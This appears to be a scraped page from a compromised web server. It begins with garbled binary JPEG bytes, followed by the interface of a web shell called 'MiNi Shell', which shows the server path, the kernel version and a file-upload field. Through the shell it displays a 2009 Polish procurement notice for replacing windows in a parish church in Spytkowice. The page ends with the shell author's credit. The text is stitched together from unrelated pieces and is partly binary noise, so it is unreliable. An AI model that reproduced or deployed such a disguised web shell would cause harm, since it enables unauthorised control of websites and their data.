JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090602/176548-N-2009.html

<p class="kh_header"><b>Spytkowice: Wymiana okien w budynku kościoła parafialnego p.w Św. Katarzyny  położonego na dz.nr 4970 obr. Spytkowice,  przy ul. Jana  Pawła II  w Spytkowicach</b><br>
<b>Numer ogłoszenia: 176548 - 2009; data zamieszczenia: 02.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Parafia Rzymsko-Katolicka pw. św. Katarzyny w Spytkowicach , ul. Jana Pawła II 2, 34-116 Spytkowice, woj. małopolskie, tel. 0-33 8791195, faks 0-33 8724807.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.parafiaspytkowice.home.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: parafia rzymsko katolicka.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana okien w budynku kościoła parafialnego p.w Św. Katarzyny  położonego na dz.nr 4970 obr. Spytkowice,  przy ul. Jana  Pawła II  w Spytkowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wymiana okien w budynku kościoła parafialnego p.w  Św. Katarzyny  położonego na dz.nr 4970 obr. Spytkowice, przy ul. Jana  Pawła II  w Spytkowicach
Zakres prac obejmuje:
demontaż  istniejącej stolarki  okiennej  wraz z parapetami montaż  nowej stolarki okiennej stalowej ze szkłem witrażowym i przeźroczystym (okna  mają osadzone  w istniejących otworach, posiadające identyczne wymiary  oraz  podziały szporosami jak okna istniejące ) montaż   nowej stolarki okiennej drewnianej  ze szkłem przeźroczystemu, szyba o współczynniku  k minimum : 1,1 w/M2, gr 4,00mm 
( wymiary jak okna istniejące -kolor  ościeży ciemny grafit  lub  ciemny dąb)
montaż parapetów  wraz z  niezbędnym wykończeniem  otworów
 (uzupełnienie tynków, wykonanie gładzi, malowanie)
wykonanie niezbędnych robót porządkowych w obiekcie  i na terenie przyległym oraz  wywiezienie  gruzu budowlanego,  starej stolarki okiennej, parapetów i innych  odpadów  powstałych podczas  prac demontażowych  i montażowych  wraz z  ich przekazaniem na  składowisko odpadów.
zgodnie z pozwoleniem  konserwatorskim nr 622-08 z dnia  3.09.2008r 
Szczegółowy zakres robót objętych niniejszym  zamówieniem określa dokumentacja  projektowa tj:  projekt budowlany, specyfikacja techniczna odbioru i wykonania  robót  oraz przedmiar robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.30-4, 45.42.21.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy,
1)  posiadają uprawnienia do wykonywania działalności zgodnie z  art. 22 ust 1 ustawy Prawo  zamówień publicznych.
2)  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i  osobami zdolnymi do wykonania zamówienia lub przedstawią  pisemne zobowiązanie  innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do  wykonania zamówienia.
3)  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia 
4)  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podst.
art. 24  ust 1,2  ustawy Prawo zamówień publicznych.
5)  złożą ofertę odpowiadającą treści SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1 )  formularz ofertowy,  
2 )  kosztorys  ofertowy (uproszczone 2 miejsca po przecinku) wykonane zgodnie z przedmiarem robót,
3 ) oświadczenie o spełnieniu warunków określonych przepisami art.22 ust 1 oraz, że nie podlegają wykluczeniu  art.24 ust1 i 2 ustawy Prawo zamówień publicznych- 
4 ) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert o dopuszczeniu do udziału w postępowaniu o udzielenie zamówienia 
5 ) aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczeniu do udziału w postępowaniu  o udzielenie zamówienia.  
6 ) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczeniu udziału w postępowaniu o udzielenie zamówienia.                      
7 ) aktualną polisę, a w przypadku braku  inny dokument  potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej  w zakresie prowadzonej działalności 
8 ) kwalifikacje i doświadczenie kluczowego personelu proponowanego do udziału w tym  zamówieniu z informacją na temat ich kwalifikacji , niezbędnych do   wykonania zamówienia, a także zakresu wykonywanych przez nich czynności  - dołączając aktualne uprawnienia osób, które będą wykonywać zamówienie oraz zaświadczenia z odpowiedniej izby samorządu zawodowego.  Zamawiający żąda, aby przy realizacji zamówienia wykonawca zatrudnił kierownika robót, które posiada uprawnienia budowlane o specjalności konstrukcyjno - budowlanej, a także należącego do Okręgowej Izby Inżynierów Budownictwa, zgodnie z przepisami ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity  Dz.U z 2006r. Nr  156 poz 1118) i ustawy z dnia 15 grudnia 2000r o samorządzie  zawodowych architektów, inżynierów budownictwa  oraz urbanistów (Dz. U z 2001r Nr5 poz.42 z późn. zm )  
9 ) wykaz zamówień zrealizowanych w okresie 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 zamówienia na roboty budowlane o porównywalnym zakresie do zamówienia przewidzianego w niniejszym postępowaniu 
( za robotę budowlaną o porównywalnym zakresie zamawiający uważa wykonanie robót na obiektach zabytkowych tj, co najmniej  jedną robotę polegająca na wymianie stolarki budowlanej ) z podaniem inwestora, zakresu robót , wartości , daty i miejsca wykonania robót oraz załączenie  dokumentów  potwierdzających, że roboty te zostały wykonane  należycie  (np. referencje), sporządzonych zgodnie ze wzorem, stanowiącym. 
10)  informacje na temat  podwykonawców. 
11) na potwierdzenie spełnienia wymagań   art. 8 i art. 9 ustawy z dnia 16 kwietnia 2004r  o wyrobach budowlanych  ( Dz. U .Nr 92 poz  881  ) należy przedstawić: 
-   aprobatę techniczną na oferowany system stolarki,
-   certyfikat zgodności  lub krajową  deklarację zgodności z aprobatą techniczną  na system stolarki  z wstępnymi wynikami badań , z certyfikatem na  szybę   uprawniającym  do oznakowania wyrobu na znak bezpieczeństwa B, 
-   świadectwo badań  Instytutu  Szkła i Ceramiki,  
-   atest  higieniczny  Państwowego Zakładu Higieny  na okna zgodnie z parametrami zawartymi w opisie przedmiotu zamówienia  lub dokument  potwierdzający zgodności z normą  PN-EN 14351-2006. 
12)  zaakceptowany wzór umowy ( parafowane  na wszystkich stronach wzoru umowy).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.parafiaspytkowice.home.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kancelaria  Parafii  Spytkowice pw.Św Katarzyna w Spytkowicach,
 ul Jana Pawła II 2.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.06.2009 godzina 10:00, miejsce: Kancelaria Paraffi Spytkowice pw.Św Katarzyny w Spytkowicach ul.Jana Pawła II 2.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com